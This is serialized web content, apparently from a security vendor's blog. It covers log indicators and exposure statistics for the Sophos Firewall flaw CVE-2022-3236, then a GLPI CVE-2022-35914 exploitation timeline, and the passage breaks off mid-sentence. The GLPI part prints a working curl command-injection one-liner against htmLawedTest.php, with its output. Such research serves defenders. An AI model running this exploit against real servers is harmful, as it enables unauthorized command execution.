We performed a version scan of the servers we identified on Shodan, and found the following results (some low volume hotfixed versions excluded from the graphs due to size):",[1925,111717,111718],{},[18,111719,111720],{},"Sophos Firewalls Using Fixed Versions",[11128,111722],{":labels":111723,":values":111724},"[\"18.5.5.509\",\"19.5.0.197\",\"19.0.2\"]","[117,57,0]",[1925,111726,111727],{},[18,111728,111729],{},"Sophos Firewalls Using Versions with a Hotfix Available",[11128,111731],{":labels":111732,":values":111733},"[\"18.5.4.418\",\"18.5.2.380\",\"18.5.3.408\",\"18.5.1.326\",\"18.0.5.586\",\"18.0.4.506\",\"17.5.12.664\",\"17.5.15.746\",\"18.0.6.655\",\"17.5.14.714\",\"17.5.17.837\",\"17.5.16.830\",\"19.0.1.365\",\"18.5.0.264\",\"18.0.3.457\",\"17.5.13.692\"]","[11619,10466,9060,6699,4045,3300,2849,2866,2425,1998,1713,1712,1141,992,955,843]",[1925,111735,111736],{},[18,111737,111738],{},"Sophos Firewalls Using Vulnerable Versions",[11128,111740],{":labels":111741,":values":111742},"[\"17.5.11.661\",\"17.5.9.577\",\"17.5.8.539\",\"17.5.10.620\",\"18.0.1.396\",\"17.5.7.511\",\"17.5.5.433\",\"17.5.6.488\",\"17.5.4.429\",\"18.0.2.403\",\"18.0.0.379\",\"18.0.0.354\",\"18.0.0.339\",\"18.0.1.367\",\"17.1.4.254\",\"18.0.0.321\",\"18.0.0.285\",\"18.0.0.180\",\"17.5.4.409\"]","[991,883,706,591,512,255,226,118,76,68,13,11,4,3,3,1,1,1,1]",[18,111744,111745],{},"More than 99% of internet-facing Sophos Firewalls haven't upgraded to versions containing the official fix for CVE-2022-3236. But around 93% are running versions that are eligible for a hotfix, and the default behavior for the firewall is to automatically download and apply hotfixes (unless disabled by an administrator). It’s likely that almost all servers eligible for a hotfix received one, although mistakes do happen. 
That still leaves more than 4,000 firewalls (or about 6% of internet-facing Sophos Firewalls) running versions that didn’t receive a hotfix and are therefore vulnerable.",[1920,111747,10612],{"id":10611},[18,111749,111750,111751,59],{},"There are firewalls that remain vulnerable to CVE-2022-3236, and the vulnerability was exploited as a 0-day for a period of time. After developing our exploit, we looked for high-quality indicators of compromise. We believe two log files have good indicators of exploitation attempts. The first file is ",[886,111752,111753],{},"\u002Flogs\u002Fcsc.log",[18,111755,111756],{},"Our exploit generates the following partially redacted log entry:",[1354,111758,111760],{"className":22307,"code":111759,"language":22309,"meta":219,"style":219},"MESSAGE   Jan 06 12:42:45Z  [worker:15566]: {\n  \"request\": {\n    \"method\": \"opcode\",\n    \"name\": \"myaccount_login\",\n    \"version\": \"1.6\",\n    \"type\": \"json\",\n    \"length\": 441,\n    \"data\": {\n      \"value\": REDACTED,\n      \"APIVersion\": \"1805.2\",\n      \"transactionid\": \"73\",\n      \"___serverport\": 443,\n      \"___serverip\": \"10.12.70.202\",\n      \"___component\": \"GUI\",\n      \"_discriminator\": REDACTED,\n      \"captcha\": \"d376b3\",\n      \"username\": \"txPGiKDy\",\n      \"mode\": 451,\n      \"currentlyloggedinuserip\": \"10.12.70.252\",\n      \"___serverprotocol\": \"HTTP\",\n      \"password\": \"****\"\n    }\n  }\n}\n",[886,111761,111762,111798,111810,111829,111848,111867,111885,111900,111912,111927,111947,111967,111982,112002,112022,112037,112056,112075,112091,112111,112130,112147,112151,112155],{"__ignoreMap":219},[1373,111763,111764,111767,111770,111772,111774,111776,111778,111781,111784,111786,111789,111792,111794,111796],{"class":1375,"line":1376},[1373,111765,111766],{"class":4640},"MESSAGE   Jan 
",[1373,111768,111769],{"class":5467},"06",[1373,111771,52062],{"class":5467},[1373,111773,4606],{"class":4640},[1373,111775,107445],{"class":5467},[1373,111777,4606],{"class":4640},[1373,111779,111780],{"class":5467},"45",[1373,111782,111783],{"class":4640},"Z  ",[1373,111785,7035],{"class":1383},[1373,111787,111788],{"class":28571},"worker:",[1373,111790,111791],{"class":5467},"15566",[1373,111793,15050],{"class":1383},[1373,111795,20051],{"class":4640},[1373,111797,8904],{"class":1383},[1373,111799,111800,111802,111804,111806,111808],{"class":1375,"line":220},[1373,111801,23732],{"class":9152},[1373,111803,75186],{"class":9155},[1373,111805,183],{"class":9152},[1373,111807,4606],{"class":1383},[1373,111809,4765],{"class":1383},[1373,111811,111812,111814,111816,111818,111820,111822,111825,111827],{"class":1375,"line":1266},[1373,111813,19050],{"class":9152},[1373,111815,49218],{"class":9165},[1373,111817,183],{"class":9152},[1373,111819,4606],{"class":1383},[1373,111821,4883],{"class":9173},[1373,111823,111824],{"class":9176},"opcode",[1373,111826,183],{"class":9173},[1373,111828,9062],{"class":1383},[1373,111830,111831,111833,111835,111837,111839,111841,111844,111846],{"class":1375,"line":1852},[1373,111832,19050],{"class":9152},[1373,111834,30774],{"class":9165},[1373,111836,183],{"class":9152},[1373,111838,4606],{"class":1383},[1373,111840,4883],{"class":9173},[1373,111842,111843],{"class":9176},"myaccount_login",[1373,111845,183],{"class":9173},[1373,111847,9062],{"class":1383},[1373,111849,111850,111852,111854,111856,111858,111860,111863,111865],{"class":1375,"line":4692},[1373,111851,19050],{"class":9152},[1373,111853,78520],{"class":9165},[1373,111855,183],{"class":9152},[1373,111857,4606],{"class":1383},[1373,111859,4883],{"class":9173},[1373,111861,111862],{"class":9176},"1.6",[1373,111864,183],{"class":9173},[1373,111866,9062],{"class":1383},[1373,111868,111869,111871,111873,111875,111877,111879,111881,111883],{"class":1375,"line":4724},[1373,111870,1905
0],{"class":9152},[1373,111872,26399],{"class":9165},[1373,111874,183],{"class":9152},[1373,111876,4606],{"class":1383},[1373,111878,4883],{"class":9173},[1373,111880,22309],{"class":9176},[1373,111882,183],{"class":9173},[1373,111884,9062],{"class":1383},[1373,111886,111887,111889,111891,111893,111895,111898],{"class":1375,"line":4756},[1373,111888,19050],{"class":9152},[1373,111890,27440],{"class":9165},[1373,111892,183],{"class":9152},[1373,111894,4606],{"class":1383},[1373,111896,111897],{"class":5467}," 441",[1373,111899,9062],{"class":1383},[1373,111901,111902,111904,111906,111908,111910],{"class":1375,"line":4768},[1373,111903,19050],{"class":9152},[1373,111905,9156],{"class":9165},[1373,111907,183],{"class":9152},[1373,111909,4606],{"class":1383},[1373,111911,4765],{"class":1383},[1373,111913,111914,111916,111918,111920,111922,111925],{"class":1375,"line":4792},[1373,111915,26357],{"class":9152},[1373,111917,85021],{"class":86922},[1373,111919,183],{"class":9152},[1373,111921,4606],{"class":1383},[1373,111923,111924],{"class":28571}," 
REDACTED",[1373,111926,9062],{"class":1383},[1373,111928,111929,111931,111934,111936,111938,111940,111943,111945],{"class":1375,"line":4798},[1373,111930,26357],{"class":9152},[1373,111932,111933],{"class":86922},"APIVersion",[1373,111935,183],{"class":9152},[1373,111937,4606],{"class":1383},[1373,111939,4883],{"class":9173},[1373,111941,111942],{"class":9176},"1805.2",[1373,111944,183],{"class":9173},[1373,111946,9062],{"class":1383},[1373,111948,111949,111951,111954,111956,111958,111960,111963,111965],{"class":1375,"line":4806},[1373,111950,26357],{"class":9152},[1373,111952,111953],{"class":86922},"transactionid",[1373,111955,183],{"class":9152},[1373,111957,4606],{"class":1383},[1373,111959,4883],{"class":9173},[1373,111961,111962],{"class":9176},"73",[1373,111964,183],{"class":9173},[1373,111966,9062],{"class":1383},[1373,111968,111969,111971,111974,111976,111978,111980],{"class":1375,"line":4817},[1373,111970,26357],{"class":9152},[1373,111972,111973],{"class":86922},"___serverport",[1373,111975,183],{"class":9152},[1373,111977,4606],{"class":1383},[1373,111979,26551],{"class":5467},[1373,111981,9062],{"class":1383},[1373,111983,111984,111986,111989,111991,111993,111995,111998,112000],{"class":1375,"line":4825},[1373,111985,26357],{"class":9152},[1373,111987,111988],{"class":86922},"___serverip",[1373,111990,183],{"class":9152},[1373,111992,4606],{"class":1383},[1373,111994,4883],{"class":9173},[1373,111996,111997],{"class":9176},"10.12.70.202",[1373,111999,183],{"class":9173},[1373,112001,9062],{"class":1383},[1373,112003,112004,112006,112009,112011,112013,112015,112018,112020],{"class":1375,"line":4835},[1373,112005,26357],{"class":9152},[1373,112007,112008],{"class":86922},"___component",[1373,112010,183],{"class":9152},[1373,112012,4606],{"class":1383},[1373,112014,4883],{"class":9173},[1373,112016,112017],{"class":9176},"GUI",[1373,112019,183],{"class":9173},[1373,112021,9062],{"class":1383},[1373,112023,112024,112026,112029,112031,112033,112035],{"class"
:1375,"line":4843},[1373,112025,26357],{"class":9152},[1373,112027,112028],{"class":86922},"_discriminator",[1373,112030,183],{"class":9152},[1373,112032,4606],{"class":1383},[1373,112034,111924],{"class":28571},[1373,112036,9062],{"class":1383},[1373,112038,112039,112041,112043,112045,112047,112049,112052,112054],{"class":1375,"line":4849},[1373,112040,26357],{"class":9152},[1373,112042,104608],{"class":86922},[1373,112044,183],{"class":9152},[1373,112046,4606],{"class":1383},[1373,112048,4883],{"class":9173},[1373,112050,112051],{"class":9176},"d376b3",[1373,112053,183],{"class":9173},[1373,112055,9062],{"class":1383},[1373,112057,112058,112060,112062,112064,112066,112068,112071,112073],{"class":1375,"line":4877},[1373,112059,26357],{"class":9152},[1373,112061,4870],{"class":86922},[1373,112063,183],{"class":9152},[1373,112065,4606],{"class":1383},[1373,112067,4883],{"class":9173},[1373,112069,112070],{"class":9176},"txPGiKDy",[1373,112072,183],{"class":9173},[1373,112074,9062],{"class":1383},[1373,112076,112077,112079,112082,112084,112086,112089],{"class":1375,"line":4915},[1373,112078,26357],{"class":9152},[1373,112080,112081],{"class":86922},"mode",[1373,112083,183],{"class":9152},[1373,112085,4606],{"class":1383},[1373,112087,112088],{"class":5467}," 
451",[1373,112090,9062],{"class":1383},[1373,112092,112093,112095,112098,112100,112102,112104,112107,112109],{"class":1375,"line":4931},[1373,112094,26357],{"class":9152},[1373,112096,112097],{"class":86922},"currentlyloggedinuserip",[1373,112099,183],{"class":9152},[1373,112101,4606],{"class":1383},[1373,112103,4883],{"class":9173},[1373,112105,112106],{"class":9176},"10.12.70.252",[1373,112108,183],{"class":9173},[1373,112110,9062],{"class":1383},[1373,112112,112113,112115,112118,112120,112122,112124,112126,112128],{"class":1375,"line":4947},[1373,112114,26357],{"class":9152},[1373,112116,112117],{"class":86922},"___serverprotocol",[1373,112119,183],{"class":9152},[1373,112121,4606],{"class":1383},[1373,112123,4883],{"class":9173},[1373,112125,6290],{"class":9176},[1373,112127,183],{"class":9173},[1373,112129,9062],{"class":1383},[1373,112131,112132,112134,112136,112138,112140,112142,112145],{"class":1375,"line":4952},[1373,112133,26357],{"class":9152},[1373,112135,86310],{"class":86922},[1373,112137,183],{"class":9152},[1373,112139,4606],{"class":1383},[1373,112141,4883],{"class":9173},[1373,112143,112144],{"class":9176},"****",[1373,112146,19057],{"class":9173},[1373,112148,112149],{"class":1375,"line":6776},[1373,112150,4795],{"class":1383},[1373,112152,112153],{"class":1375,"line":6781},[1373,112154,27147],{"class":1383},[1373,112156,112157],{"class":1375,"line":7524},[1373,112158,1855],{"class":1383},[18,112160,112161,112162,112164,112165,112168],{},"The presence of the ",[886,112163,112028],{}," field in a login request is sufficient to detect an exploit attempt. 
The other log, ",[886,112166,112167],{},"\u002Flog\u002FvalidationError.log",", has a similar, but much more verbose indicator.",[1354,112170,112173],{"className":112171,"code":112172,"language":1359},[1357],"********** Entity json validation log:6-1-2023  7:42:33 Objectname=login::login\n\n    => Validation start for: password\n\n     - Validating type : SCALAR,STRING\n\n     - Validating 'datatype' : Result=true\n\n     - Validating 'require' : Result=true\n\n     - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n    => Validation start for: mode\n\n     - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n    => Validation start for: value\n\n     - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n    => Validation start for: APIVersion\n\n     - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n    => Validation start for: captcha\n\n     - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n    => Validation start for: ___serverip\n\n     - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n    => Validation start for: currentlyloggedinuserip\n\n     - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n    => Validation start for: username\n\n     - Validating type : SCALAR,STRING\n\n     - Validating 'datatype' : Result=true\n\n     - Validating 'require' : Result=true\n\n     - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n    => Validation start for: ___serverprotocol\n\n     - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n    => Validation start for: transactionid\n\n     - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n    => Validation start for: ___serverport\n\n     - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n    => Validation start for: _discriminator\n\n     - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n    => Validation start for: ___component\n\n     - Validating 'validateValidAndInvalidInput' 
for type SCALAR\n",[886,112174,112172],{"__ignoreMap":219},[18,112176,112177,112178,112180],{},"Again, note the presence of the ",[886,112179,112028],{}," field within a login request. We encourage Sophos Firewall administrators to look through their logs to determine if they see these indications of an exploit attempt.",[1920,112182,112184],{"id":112183},"limitations-of-exploitation","Limitations of Exploitation",[18,112186,112187],{},"While CVE-2022-3236 does allow an attacker to inject and execute arbitrary Perl, there is a limitation to mass exploitation. By default, Sophos Firewall requires web clients to solve a captcha during authentication.",[18,112189,112190],{},[68,112191],{":width":10862,"alt":104608,"src":112192},"\u002Fblog\u002Fsophos-cve-2022-3236\u002Fcaptcha.png",[18,112194,112195],{},"The vulnerable code is only reached after the captcha is validated. A failed captcha will result in the exploit failing. While not impossible, programmatically solving captchas is a high hurdle for most attackers. Most internet-facing Sophos Firewalls appear to have the login captcha enabled, which means, even at the most opportune times, this vulnerability was unlikely to have been successfully exploited at scale.",[1920,112197,1903],{"id":1902},[18,112199,112200],{},"CVE-2022-3236 is one of those rare vulnerabilities that has been exploited in the wild with few details ever made public. Having developed an exploit ourselves, we can say this vulnerability was likely never as scary as it sounded thanks to the swift work of Sophos and good default security settings on the firewall itself. 
Internet-facing firewalls appear to largely be eligible for hotfixes and the default authentication captcha likely prevented mass exploitation.",[18,112202,95204,112203,95208],{},[47,112204,78319],{"href":78319,"rel":112205},[51],[2901,112207,112208],{},"html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .s4fT8, html code.shiki .s4fT8{--shiki-light:#90A4AE;--shiki-light-font-style:inherit;--shiki-default:#B31D28;--shiki-default-font-style:italic;--shiki-dark:#FDAEB7;--shiki-dark-font-style:italic;--shiki-sepia:#F44747;--shiki-sepia-font-style:inherit}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki 
.sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sTC9v, html code.shiki .sTC9v{--shiki-light:#F76D47;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: 
var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":112210},[],"2023-01-13","Sophos Firewalls were exploited using CVE-2022-3236 in September, 2022. Few details have been published about this vulnerability. In this blog, we look at log entries the exploit creates and determine how many vulnerable internet-facing firewalls still exist.",{"slug":112214},"sophos-cve-2022-3236","\u002Fblog\u002Fsophos-cve-2022-3236",{"title":111566,"description":112212},"blog\u002Fsophos-cve-2022-3236",[242],"ZWny5acEL-L25OF4J2EjEuFSFwYDmv4s806zlQF0kac",{"id":112221,"title":112222,"articles":112223,"authors":112229,"body":112231,"date":112555,"description":112556,"extension":234,"image":7,"link":7,"meta":112557,"navigation":237,"path":112559,"seo":112560,"series":7,"stem":112561,"subtype":7,"tags":112562,"__hash__":112563},"blog\u002Fblog\u002Fglpi-exploitation.md","GLPI Exploitation Timeline",[112224,112228],{"title":112225,"source":14382,"link":112226,"date":112227},"CISA's KEV Catalog Updated with 3 New Flaws Threatening IT Management Systems","https:\u002F\u002Fthehackernews.com\u002F2023\u002F03\u002Fcisas-kev-catalog-updated-with-3-new.html","2023-03-08",{"title":112225,"source":14382,"link":112226,"date":106091},[112230],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":112232,"toc":112553},[112233,112235,112249,112254,112258,112299,112308,112313,112317,112324,112330,112333,112337,112344,112347,112350,112353,112360,112462,112465,112468,112476,112482,112499,112505,112521,112526,112530,112539,112541,112544,112550],[1920,112234,11648],{"id":11647},[18,112236,36764,112237,112240,112241,112245,112246],{},[47,112238,42306],{"href":214,"rel":112239},[51]," service, VulnCheck tracks vulnerabilities exploited in the wild. 
",[47,112242,112244],{"href":107333,"rel":112243},[51],"Prioritizing"," known exploited vulnerabilities for remediation is a smart strategy to minimize vulnerability risk. However, that strategy breaks down when some exploited vulnerabilities are overlooked. Consider the growing gap between vulnerabilities VulnCheck tracks as exploited in the wild and the ",[47,112247,100825],{"href":2864,"rel":112248},[51],[1925,112250,112251],{},[18,112252,112253],{},"Exploited in the Wild Vulnerabilities Published in 2022",[11128,112255],{":labels":112256,":values":112257},"[\"VulnCheck\",\"CISA KEV Catalog\"]","[135,98]",[18,112259,112260,112261,112264,112265,112270,112271,112276,112277,1246,112282,1255,112287,112292,112293,112298],{},"For CVE published in 2022, VulnCheck is tracking 37 more exploited vulnerabilities than the CISA KEV Catalog. One vulnerability that we’re tracking and KEV isn’t is ",[47,112262,106263],{"href":107165,"rel":112263},[51],", a trivial unauthenticated and remote command execution vulnerability affecting ",[47,112266,112269],{"href":112267,"rel":112268},"https:\u002F\u002Fglpi-project.org\u002F",[51],"GLPI",". GLPI is ",[47,112272,112275],{"href":112273,"rel":112274},"https:\u002F\u002Fgithub.com\u002Fglpi-project\u002Fglpi",[51],"open source"," software that can serve as a helpdesk, asset manager, administrator, and more. Their website displays logos of well-known customers such as ",[47,112278,112281],{"href":112279,"rel":112280},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FAirbus",[51],"Airbus",[47,112283,112286],{"href":112284,"rel":112285},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FLa_Poste_(France)",[51],"La Poste",[47,112288,112291],{"href":112289,"rel":112290},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FBeIN_Sports",[51],"beIN Sports",". 
The website further describes ",[47,112294,112297],{"href":112295,"rel":112296},"https:\u002F\u002Fglpi-project.org\u002Fcategory\u002Fsuccess-cases\u002F",[51],"success cases"," where customers have deployed the software in business critical roles.",[18,112300,112301,112302,112307],{},"Exposing critical IT management software to the internet is a mistake the security industry sees often. Censys can find approximately ",[47,112303,112306],{"href":112304,"rel":112305},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=services.http.response.body%3A%22_glpi_csrf_token%22",[51],"15,000"," internet-facing GLPI instances.",[1925,112309,112310],{},[18,112311,112312],{},"Top 10 Countries with Internet-Facing Non-Virtualized GLPI Instances",[11128,112314],{":labels":112315,":values":112316},"[\"Brazil\",\"France\",\"United States\",\"Russia\",\"Germany\",\"Colombia\",\"Spain\",\"Canada\",\"Argentina\",\"Italy\"]","[1100,771,606,195,148,146,108,73,65,63]",[18,112318,112319,112323],{},[47,112320,41731],{"href":112321,"rel":112322},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=html%3A%22_glpi_csrf_token%22",[51]," doesn’t see half as many instances as Censys, but it is able to create an interesting historical graph of internet-facing GLPI services.",[18,112325,112326],{},[68,112327],{":width":10862,"alt":112328,"src":112329},"shodan-timeline","\u002Fblog\u002Fglpi-exploitation\u002Fglpi-historical.png",[18,112331,112332],{},"Since September 2022, Shodan has seen a steep drop off of GLPI. 
We believe the reason for this drop off can be explained using the exploitation timeline for CVE-2022-35914.",[1920,112334,112336],{"id":112335},"cve-2022-35914-vulnerability-timeline","CVE-2022-35914 Vulnerability Timeline",[18,112338,112339,112340,4606],{},"Using VulnCheck’s Exploit Intelligence API, we’ve compiled the following timeline for ",[47,112341,106263],{"href":112342,"rel":112343},"https:\u002F\u002Fapi.vulncheck.com\u002Fv2\u002Fexploits\u002Fcve\u002FCVE-2022-35914",[51],[61025,112345],{":entries":112346},"[{\"date\":\"September 14, 2022\",\"markdown\":\"GLPI [announces](https:\u002F\u002Fglpi-project.org\u002Fnew-glpi-version-10-0-3\u002F) the release of version 10.3 and a fix for a “command injection” assigned CVE-2022-35914.\"},{\"date\":\"September 19, 2022\",\"markdown\":\"CVE-2022-35914 is published to [NVD](https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-35914).\"},{\"date\":\"September 30, 2022\",\"markdown\":\"The first public [proof of concept exploit](https:\u002F\u002Fgithub.com\u002Fcosad3s\u002FCVE-2022-35914-poc) is posted to GitHub.\"},{\"date\":\"October 2, 2022\",\"markdown\":\"A [full disclosure blog](https:\u002F\u002Fmayfly277.github.io\u002Fposts\u002FGLPI-htmlawed-CVE-2022-35914\u002F) is published.\"},{\"date\":\"October 3, 2022\",\"markdown\":\"A [tweet](https:\u002F\u002Ftwitter.com\u002FM4yFly\u002Fstatus\u002F1576875657732435968) containing a proof of concept exploit is posted.\"},{\"date\":\"October 5, 2022\",\"markdown\":\"GLPI publishes an [important message](https:\u002F\u002Fglpi-project.org\u002Fsecurity-update-10-0-3-and-9-5-9\u002F), stating CVE-2022-35914 has been exploited “massively.”\"},{\"date\":\"October 13, 2022\",\"markdown\":\"Shadowserver [tweets](https:\u002F\u002Ftwitter.com\u002FShadowserver\u002Fstatus\u002F1580475994590220288) that they’re seeing exploitation attempts on their honeypots.\"},{\"date\":\"October 19, 2022\",\"markdown\":\"A [pull 
request](https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fpull\u002F17162) is created for a CVE-2022-35914 Metasploit module.\"},{\"date\":\"October 25, 2022\",\"markdown\":\"The Metasploit module is merged into the master branch and archived on [packet storm](https:\u002F\u002Fpacketstormsecurity.com\u002Ffiles\u002F169501\u002FGLPI-10.0.2-Command-Injection.html).\"},{\"date\":\"November 6, 2022\",\"markdown\":\"A curl-based one-line [proof of concept](https:\u002F\u002Fgithub.com\u002F0xGabe\u002FCVE-2022-35914) is posted to GitHub.\"},{\"date\":\"December 12, 2022\",\"markdown\":\"A “mass” scanner is advertised for sale on [Twitter](https:\u002F\u002Ftwitter.com\u002Fxstro0\u002Fstatus\u002F1603154229962878976).\"}]",[18,112348,112349],{},"There is a lot going on here, but there are a few parts that are specifically worth calling out. First, there is a critical five day gap between GLPI announcing the security patch and the CVE being published to NVD. For better or worse, vulnerabilities often don’t “exist” in the security industry until they’ve been published by MITRE and NVD. That’s five days where this vulnerability was known to the world, but much of the security industry remained ignorant.",[18,112351,112352],{},"A proof of concept exploit was published to GitHub a little more than two weeks after the GLPI security patch was issued. That was rapidly followed by a full disclosure blog and, a few days later, GLPI announced “massive” exploitation in the wild. While not ideal, that's about as good a timeline defenders can reasonably expect for such a straightforward vulnerability. Ultimately, defenders had 18 days to patch before a full disclosure blog was released.",[18,112354,112355,112356,112359],{},"Researcher and attacker interest continued through October. Shadowserver tweeted about active exploitation in the middle of the month, and a Metasploit module was merged into the master branch in late October. 
In November a simple curl-based one-line proof of concept was published. This is worth noting because other proof of concepts were complicated by scraping a valid ",[886,112357,112358],{},"sid",", when any old value would do.",[100588,112361,112362],{},[1354,112363,112365],{"className":31740,"code":112364,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl -s -d 'sid=foo&hhook=exec&text=id' -b 'sid=foo' http:\u002F\u002F10.12.70.206\u002Fglpi\u002Fvendor\u002Fhtmlawed\u002Fhtmlawed\u002FhtmLawedTest.php | egrep '\\&nbsp; \\[[0-9]+\\] =\\&gt;'| sed -E 's\u002F\\&nbsp; \\[[0-9]+\\] =\\&gt; (.*)\u003Cbr \\\u002F>\u002F\\1\u002F'\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n",[886,112366,112367,112424],{"__ignoreMap":219},[1373,112368,112369,112371,112373,112375,112377,112379,112382,112384,112387,112389,112392,112394,112397,112399,112402,112404,112407,112409,112411,112414,112417,112419,112422],{"class":1375,"line":1376},[1373,112370,55482],{"class":2206},[1373,112372,2222],{"class":1391},[1373,112374,2239],{"class":2209},[1373,112376,87473],{"class":2209},[1373,112378,4713],{"class":1387},[1373,112380,112381],{"class":1391},"sid=foo&hhook=exec&text=id",[1373,112383,1388],{"class":1387},[1373,112385,112386],{"class":2209}," -b",[1373,112388,4713],{"class":1387},[1373,112390,112391],{"class":1391},"sid=foo",[1373,112393,1388],{"class":1387},[1373,112395,112396],{"class":1391}," http:\u002F\u002F10.12.70.206\u002Fglpi\u002Fvendor\u002Fhtmlawed\u002Fhtmlawed\u002FhtmLawedTest.php",[1373,112398,2233],{"class":1397},[1373,112400,112401],{"class":2206}," egrep",[1373,112403,4713],{"class":1387},[1373,112405,112406],{"class":1391},"\\&nbsp; \\[[0-9]+\\] =\\&gt;",[1373,112408,1388],{"class":1387},[1373,112410,17472],{"class":1397},[1373,112412,112413],{"class":2206}," sed",[1373,112415,112416],{"class":2209}," -E",[1373,112418,4713],{"class":1387},[1373,112420,112421],{"class":1391},"s\u002F\\&nbsp; \\[[0-9]+\\] =\\&gt; (.*)\u003Cbr 
\\\u002F>\u002F\\1\u002F",[1373,112423,76063],{"class":1387},[1373,112425,112426,112428,112430,112432,112434,112436,112438,112440,112442,112444,112446,112448,112450,112452,112454,112456,112458,112460],{"class":1375,"line":220},[1373,112427,75926],{"class":4640},[1373,112429,5417],{"class":1397},[1373,112431,58821],{"class":1391},[1373,112433,1384],{"class":1383},[1373,112435,105613],{"class":2206},[1373,112437,2230],{"class":1383},[1373,112439,75941],{"class":4640},[1373,112441,5417],{"class":1397},[1373,112443,58821],{"class":1391},[1373,112445,1384],{"class":1383},[1373,112447,105613],{"class":2206},[1373,112449,2230],{"class":1383},[1373,112451,75954],{"class":4640},[1373,112453,5417],{"class":1397},[1373,112455,58821],{"class":1391},[1373,112457,1384],{"class":1383},[1373,112459,105613],{"class":2206},[1373,112461,11875],{"class":1383},[18,112463,112464],{},"Finally, as recently as December a “mass scanner” was advertised on Twitter, although the asking price of $10 seems suspect. Regardless, the timeline and the Shodan chart depicting a drop-off after September 2022 complement each other. GLPI instances appear to have been removed from the internet as exploitation ramped up. GLPI’s announcement and ShadowServer’s tweet about exploitation in the wild leave little doubt that CVE-2022-35914 has been exploited in the wild.",[1920,112466,41953],{"id":112467},"active-exploitation",[18,112469,112470,112471,112475],{},"A couple of months have passed since GLPI and ShadowServer shared their observations regarding active exploitation of CVE-2022-35914. We think it’s useful to know if the vulnerability is still under active exploitation. There are two sources that can help us quickly answer that question. First, ShadowServer maintains a useful 